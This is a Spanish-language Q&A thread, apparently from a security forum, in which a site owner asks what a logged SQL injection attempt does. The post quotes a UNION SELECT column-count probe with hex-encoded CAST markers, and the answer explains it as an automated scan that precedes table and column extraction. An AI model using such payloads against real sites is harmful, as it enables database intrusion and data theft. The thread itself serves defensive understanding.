¿Qué está intentando lograr este ataque de inyección?

Question

¿Qué está intentando lograr este ataque de inyección?

#1 de Affe (2 votos)

1

Mi sitio ha sido golpeado repetidamente con esta consulta. Me pregunto qué es lo que el atacante está tratando de ganar. La URL es: my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--

Los primeros cuatro números en myID son una ID legítima. Después de todos, obviamente es un intento de inyección de SQL. Esto es lo que parece con %20 s reemplazado con espacios y formato básico:

UNION SELECT cAsT(0x2d78312d512d as char),/**/ cAsT(0x2d78322d512d as char),/**/ cAsT(0x2d78332d512d as char),/**/ cAsT(0x2d78342d512d as char),/**/ cAsT(0x2d78352d512d as char),/**/ cAsT(0x2d78362d512d as char),/**/ cAsT(0x2d78372d512d as char),/**/ cAsT(0x2d78382d512d as char),/**/ cAsT(0x2d78392d512d as char),/**/ cAsT(0x2d7831302d512d as char),/**/ cAsT(0x2d7831312d512d as char),/**/ cAsT(0x2d7831322d512d as char),/**/ cAsT(0x2d7831332d512d as char),/**/ cAsT(0x2d7831342d512d as char),/**/ cAsT(0x2d7831352d512d as char),/**/ cAsT(0x2d7831362d512d as char),/**/ cAsT(0x2d7831372d512d as char),/**/ cAsT(0x2d7831382d512d as char),/**/ cAsT(0x2d7831392d512d as char),/**/ cAsT(0x2d7832302d512d as char),/**/ cAsT(0x2d7832312d512d as char),/**/ cAsT(0x2d7832322d512d as char),/**/ cAsT(0x2d7832332d512d as char),/**/ cAsT(0x2d7832342d512d as char),/**/ cAsT(0x2d7832352d512d as char),/**/ cAsT(0x2d7832362d512d as char),/**/ cAsT(0x2d7832372d512d as char),/**/ cAsT(0x2d7832382d512d as char),/**/ cAsT(0x2d7832392d512d as char),/**/ cAsT(0x2d7833302d512d as char),/**/ cAsT(0x2d7833312d512d as char),/**/ cAsT(0x2d7833322d512d as char),/**/ cAsT(0x2d7833332d512d as char),/**/ cAsT(0x2d7833342d512d as char),/**/ cAsT(0x2d7833352d512d as char),/**/ cAsT(0x2d7833362d512d as char),/**/ cAsT(0x2d7833372d512d as char),/**/ cAsT(0x2d7833382d512d as char),/**/ cAsT(0x2d7833392d512d as char),/**/ cAsT(0x2d7834302d512d as char),/**/ cAsT(0x2d7834312d512d as char),/**/ cAsT(0x2d7834322d512d as char),/**/ cAsT(0x2d7834332d512d as char),/**/ cAsT(0x2d7834342d512d as char),/**/ cAsT(0x2d7834352d512d as char),/**/ cAsT(0x2d7834362d512d as char),/**/ cAsT(0x2d7834372d512d as char),/**/ cAsT(0x2d7834382d512d as char)--

Cuando ejecuto esta consulta en SSMS, produce esto: Todo el camino hasta -x48-Q-. Dado que esto no es realmente consultar datos, no puedo pensar en lo que el atacante espera obtener. ¿Alguien ha visto algo como esto antes?

sql-injection

pregunta silvertiger 19.12.2018 - 22:56

fuente

1 respuesta

Lea otras preguntas en las etiquetas sql-injection

¿Cómo podría el malware sobrevivir al formato de disco duro sin residir en el firmware? ¿Nombre de dominio vs IP solo de alojamiento?

score 2 · Accepted Answer

Esto parece un simple análisis de vulnerabilidades.

El operador SQL UNION requiere que la segunda consulta devuelva el mismo número de columnas que la primera, por lo que el atacante repetirá intentando unir cada vez más grandes. Si observa, es probable que tenga 48 hits contando por uno cada vez, no el mismo intento con 48 columnas varias veces.

Si uno de esos intentos da como resultado una página que contiene -x#-Q- , volverán e intentarán diseñar un ataque real insertando funciones para extraer nombres de tablas y columnas, etc. en la posición # .